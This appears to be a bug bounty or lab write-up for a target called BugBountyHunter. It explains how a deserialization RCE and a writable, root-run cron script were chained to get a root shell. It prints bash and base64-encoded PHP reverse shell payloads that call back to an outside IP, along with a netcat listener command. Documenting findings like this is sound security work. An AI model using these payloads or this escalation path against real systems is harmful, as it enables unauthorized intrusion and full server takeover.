BugBountyHunter

As I reported in https://www.bugbountyhunter.com/hackevents/report?id=475 the site contains an insecure deserialization vulnerability which leads to RCE.

After I exploited it and popped a reverse shell with this payload:

/bin/bash -c 'bash -i >& /dev/tcp/157.230.125.192/1234 0>&1'

I noticed that the current user is fb-exec (non-privileged).

After navigating through the file system and reading files, I found file scheduler.php with this comment:

/*
Tell Raymond on the server team to turn off the crontab until we need it
-Patrice
*/

I checked cron jobs and found this one (in the /etc/cron.d/firstblood file):

* * * * * root cd /app/firstblood && php scheduler.php >> /dev/null 2>&1

So this scheduler.php file is executed via php by the root user every minute.

And fb-exec user can write to this file.

So to become the root of this server, we can write another reverse shell payload to this file:

echo PD9waHAgc3lzdGVtKCIvYmluL2Jhc2ggLWMgJ2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTU3LjIzMC4xMjUuMTkyLzEyMzQgMD4mMSciKTsgPz4= | base64 -d > scheduler.php

where PD9waHAgc3lzdGVtKCIvYmluL2Jhc2ggLWMgJ2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTU3LjIzMC4xMjUuMTkyLzEyMzQgMD4mMSciKTsgPz4= is our base64 encoded php reverse shell code:

<?php system("/bin/bash -c 'bash -i >& /dev/tcp/157.230.125.192/1234 0>&1'"); ?>

And after running nc -nvlp 1234 on my server (157.230.125.192) and waiting a bit, I got the root shell:

id
uid=0(root) gid=0(root) groups=0(root)